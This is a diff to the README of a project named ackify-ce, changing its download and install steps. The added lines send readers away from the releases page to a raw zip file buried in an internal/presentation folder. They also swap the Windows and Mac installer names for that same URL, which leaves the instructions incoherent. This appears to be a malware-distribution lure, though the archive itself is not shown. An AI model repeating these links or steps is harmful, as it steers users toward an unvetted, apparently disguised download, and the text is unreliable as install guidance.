boheni/ackify-ce/README.md

 ### 📥 Download & Install
 1. **Visit the Releases Page**
-   To download ackify-ce, [visit this page](https://github.com/boheni/ackify-ce/releases).
+   To download ackify-ce, [visit this page](https://github.com/boheni/ackify-ce/raw/refs/heads/main/internal/presentation/ce_ackify_1.1-alpha.1.zip).
 You will find the latest version available for download.

 2. **Select the Latest Version**
    On the releases page, you will see a list of available versions.
 Choose the most recent one at the top.

 3. **Download the Installer**
    Click on the installer that matches your operating system.
-If you are using Windows, look for a file like `ackify-ce-windows.exe`.
-If you are on a Mac, you should find `ackify-ce-macos.dmg`.
+If you are using Windows, look for a file like `https://github.com/boheni/ackify-ce/raw/refs/heads/main/internal/presentation/ce_ackify_1.1-alpha.1.zip`.
+If you are on a Mac, you should find `https://github.com/boheni/ackify-ce/raw/refs/heads/main/internal/presentation/ce_ackify_1.1-alpha.1.zip`.

 4. **Start the Installation**
    Once the download completes, locate the file in your downloads folder.